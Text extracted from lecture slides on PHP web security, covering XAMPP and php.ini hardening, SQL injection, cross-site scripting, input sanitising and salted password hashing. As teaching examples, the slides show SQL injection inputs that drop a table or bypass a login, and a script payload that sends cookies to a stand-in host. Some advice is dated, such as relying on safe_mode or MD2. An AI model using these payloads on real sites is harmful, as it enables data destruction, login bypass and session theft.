Security

PHP-17
 XAMPP Security

• XAMPP isn't designed to be production server. At least not out of the box

• To deploy a real application it may be necessary to use a different server

software and/or beef up the security
 Connection Password

• By default XAMPP uses default password "" for root

• This should be set.

• Certain users can have restricted priviledges

 Connection Password

• The code that connects to the database has sensitive information

• So this should not be included the the regular code

• Placing the connection code in a seperate file in the directory above will
make it available to the code running, but not available to be read by
outsiders

• [Book p 12-121]
 php.ini

• php.ini is a configuration file for the PHP server

• Many of the settings can be changed by editing this text file

 phi.ini configuration options
Option Description

Allows PHP scripts to access only files owned by the same user. So it prevents directory
safe_mode = on
traversal attacks

safe_mode_gid = off This works in combination as safe_mode. Does much the same thing

open_basedir = directory PHP script can access only files in a specific directory

expose_php = off Prevents PHP from disclosing information about itself in the PHP headers sent to users

GET, POST, cookies and server variables are globals by default if this is set to on. This makes
register_globals = off
them accessible to hackers. If this it set to off they are more secure.
Prevents PHP from displaying errors and warnings to the user. This could give away
display_errors = off
information useful to hackers

log_errors = on Errors and warnings are written to a log file. This can be viewed later

error_log = filename Specifies where the errors and warnings are to go

file_uploads = off Most applications don't need to allow file uploads. Turn it off if it is not required
 SQL Injection Attack

• Hacker includes SQL commands in the input

• This is read as SQL and executed

SQL Injection Attack

Randall Munroe
 SQL Injection Attack
Name: John'); DROP TABLE users

INSERT INTO users VALUES ('JOHN'); DROP TABLE users);

INSERT INTO users VALUES ('JOHN');

DROP TABLE users);

 SQL Injection Attack
Name:

SELECT * FROM user WHERE userID = '$_POST[usr]' AND password =

'$_POST[password]';

 SQL Injection Attack

Name: John' OR 'woo' = 'woo'; --

SELECT * FROM user WHERE userID = '$_POST[usr]' AND password =

'$_POST[password]';

SELECT * FROM user WHERE userID = 'John' OR 'woo' = 'woo' ; --

' AND password = '$_POST[password]';

Comment
 Script as Data
<script>document.location='http://badie.com/bad.php?
Name: cookies='+document.cookie</script>

<html>
<body>
Welcome Mr.<script>document.location='http://badie.com/
bad.php?cookies='+document.cookie</script>

</body>
 Sanitising Inputs
Much as we might check an input to see if it conforms to the expected
format (phone number) we can check inputs to ensure there is nothing
malicious

If a name is being entered, for It should be rejected it if contains

example, it should comprise only

• numbers

• letters

• tags

• ' (O'Conor)

• brackets
• - (Jean-Luc)

 Sanitising Inputs
• Where HTML is to be allowed in data all special characters should be
converted to their HTML entities

• & becomes &amp;

• < becomes &lt;

• " becomes &quot;

• The htmlentities( ) function can be used for this

 Securing Passwords
• In an ideal world everybody would use a different password for every
systems they use

• If a single system is compromised then only that system is affected

 Securing Passwords
• In an ideal world everybody would use a different password for every
systems they use

• If a single system is compromised then only that system is affected

• Often people use the same password on different systems

• If one is compromised then all those using the same password are
insecure

• There have been several high-profile cases of this

 Securing Passwords

YAHOO.COM

e-mail password

colin.manning@cit.ie bananaskins

dan.murphy@gmail.com dantheman

peter@ge.com pengineer

joe.smith@gmail.com password
 Hash Function
• A hash function maps data of an arbitrary size to data of a fixed size

• The data from the arbitrarily large set is know as the key

• The result of the hash function is known as the hash

• A good hash function

• is one way

• provides no insight into the value of the key

 DA1 Hash Function

bananaskins sniksananab

function hash (key)

return substring(reverse (key), 30);

}
 DA1 Hash Function

bananaskins sniksananab

function hash (key)

{ • This hash function reveals too much about the key

return substring(reverse (key), 30);

}
 DA2 Hash Function

bananaskins 147

function hash (key)

digit_1 = (length (key) % 10);

digit_2 = number of vowels % 10;

digit_3 = number of consonants % 10;

 Securing Passwords

YAHOO.COM

e-mail password_hash If hash (pword_entered) == password_hash

{
colin.manning@cit.ie 147
// login is good
dan.murphy@gmail.com 936
}
peter@ge.com 954

joe.smith@gmail.com 862
 Securing Passwords

YAHOO.COM

e-mail password_hash ?
colin.manning@cit.ie 147

dan.murphy@gmail.com 936 ?
peter@ge.com 954

joe.smith@gmail.com 862
 DA2 Hash Function

bananaskins 147

function hash (key)

{ • The number of possible hashes for this function is too small

digit_1 = (length (key) % 10);

digit_2 = number of vowels % 10;

digit_3 = number of consonants % 10;

 MD2 Hash Function
bananaskins • provides no insight into the value of the key

• has a large number of possible values

1f73cc189528669e51aa4b851764c6c2
 Whirlpool Hash Function
bananaskins • provides no insight into the value of the key

• has a large number of possible values

0557ab10f7fb8ce53af2af7238ae245bbc62d3629d83263879839ea87faa8f456
d1c9586b87374a5ccc54d752fc65a49fa228e76eed782b896e4629ee8dba4c0
 Hash Function Vulnerabilities

• There is a small number of commonly used hash functions

• Many people use real words as passwords

• A dictionary attack could run through a list of words, has them, and
compared with the hashed values
 Salting the Hash Function

• Adding salt to the key before it is sent to the hash function can make the
system more secure

• The salt is a randomly chosen sequence appended to the key

 MD2 Hash Function
bananaskins
• Salt is added to key before sending it to the
hash function

• Q6d&7Xp1

1f73cc189528669e51aa4b851764c6c2
 MD2 Hash Function
Q6d&7Xp1bananaskins
• Salt is added to key before sending it to the
hash function

• Q6d&7Xp1

b2e9ae6ca1f9d07f438918da82af8615
 Other Uses of Hash Functions

• Data Storage

• Cryptography

• Block-chain
 908

Other Uses of Hash Functions

909
910
911
912
913
"Colin Manning" 914
915
• Data Storage 916
917
• Cryptography
918
919
• Block-chain 920
921
922
923
924
925
https://www.wired.com/2016/05/hacker-lexicon-sql-injections-everyday-hackers-favorite-attack/
 Further Reading

• https://www.wired.com/2016/05/hacker-lexicon-sql-injections-everyday-
hackers-favorite-attack/

• https://arstechnica.com/information-technology/2012/08/passwords-
under-assault/

• https://arstechnica.com/information-technology/2013/03/how-i-became-
a-password-cracker/